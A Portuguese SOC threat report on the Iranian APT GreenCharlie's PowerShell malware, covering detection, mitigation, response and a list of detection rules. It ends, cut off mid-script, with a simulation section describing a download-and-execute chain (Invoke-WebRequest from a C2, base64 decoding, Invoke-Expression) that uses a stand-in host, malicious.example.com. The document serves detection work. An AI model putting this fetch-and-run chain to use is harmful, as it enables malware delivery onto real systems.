GreenCharlie: O Relatório SOC sobre Explorações de PowerShell por APT Patrocinado pelo Irã
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo do Exploit PowerShell GreenCharlie
GreenCharlie é um grupo APT com base no Irã que realiza cyberespionagem usando uma família de malwares PowerShell de múltiplos estágios (GORBLE, TAMECAT, POWERSTAR). O grupo registra muitos domínios DNS dinâmicos para phishing, utiliza scripts PowerShell ofuscados com codificação personalizada em Base64 e bitwise, e se comunica com servidores C2 via HTTPS POST. A atividade atingiu seu pico entre maio e agosto de 2024 com IPs iranianos e serviços de VPN mascarando o tráfego.
Investigação
Analise o tráfego de rede para conexões a domínios DDNS conhecidos e intervalos de IP associados ao grupo (por exemplo, *.ddnsgeek.com, *.dns-dynamic.net). Procure cadeias de execução PowerShell que realizam decodificação Base64 seguidas por operações bitwise NOT, e scripts que invocam ScriptBlock.Create ou Invoke-Expression. Monitore injeção de processos e execução na memória de cargas úteis desencriptadas. Correlacione alertas com técnicas ATT&CK T1583.001, T1566.002, T1059.001, T1568.
Mitigação
Implemente registro restrito do PowerShell (ModuleLogging, ScriptBlockLogging) e imponha o modo de linguagem restrita. Bloqueie ou proxy o tráfego para provedores DDNS conhecidos e TLDs suspeitos (.info, .xyz, .icu, .network, .online, .site). Implante sandboxing de DNS e filtragem de URLs para domínios de phishing. Use soluções de detecção e resposta de endpoint (EDR) para detectar scripts PowerShell ofuscados e descriptografia AES na memória. Imponha o princípio do menor privilégio para contas de serviço e desative ferramentas de execução remota desnecessárias.
Resposta à Ameaça GreenCharlie
Quando um indicador é detectado, isole o host afetado, capture a memória volátil e colete logs do PowerShell. Realize análise forense para extrair a carga útil decodificada e identificar servidores C2. Revogue credenciais comprometidas, rode segredos, e remova tarefas agendadas ou mecanismos de persistência relacionados. Conduza compartilhamento de inteligência de ameaças de IOCs (domínios, IPs, valores de hash) com ISACs relevantes e atualize regras de detecção conforme necessário.
Fluxo de Ataque
Regras de Detecção PowerShell de GreenCharlie
Detecção de Malware PowerShell GreenCharlie APT [Windows Powershell]
Visualizar
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via proxy)
Visualizar
IOCs (ip) para detectar: Campanhas de Espionagem Cibernética Baseadas em PowerShell do Irã pelo APT GreenCharlie
Visualizar
IOCs (emails) para detectar: Campanhas de Espionagem Cibernética Baseadas em PowerShell do Irã pelo APT GreenCharlie
Visualizar
Instruções de Simulação de Carga Útil
-
Narrativa do Ataque & Comandos:
Estágio 1 – Recuperar o carregador malicioso:
O atacante usaInvoke-WebRequestpara baixar um script PowerShell chamado GORBLE.ps1 de um servidor C2.Estágio 2 – Codificar a carga útil:
O script baixado contém a carga maliciosa. O atacante codifica toda a carga em base64 e a armazena em uma variável$x.Estágio 3 – Executar via cmdlet de alto risco:
UsandoInvoke-Expression, o atacante decodifica$xem tempo real e a executa, invocando assim a estrutura GORBLE.Estágio 4 – Movimento lateral (opcional):
A carga pode posteriormente chamarScriptBlock.Createcom uma string ofuscada por bitwise-NOT para lançar um comando PowerShell de segundo estágio em um host remoto. -
Script de Teste de Regressão:
# ------------------------------------------------- # Simulação de Framework PowerShell GreenCharlie APT # ------------------------------------------------- # 1. Simular download do framework malicioso (palavra-chave GORBLE) $maliciousUrl = "http://malicious.example.com/GORBLE.ps1" $downloaded = @" # GORBLE - carga maliciosa simulada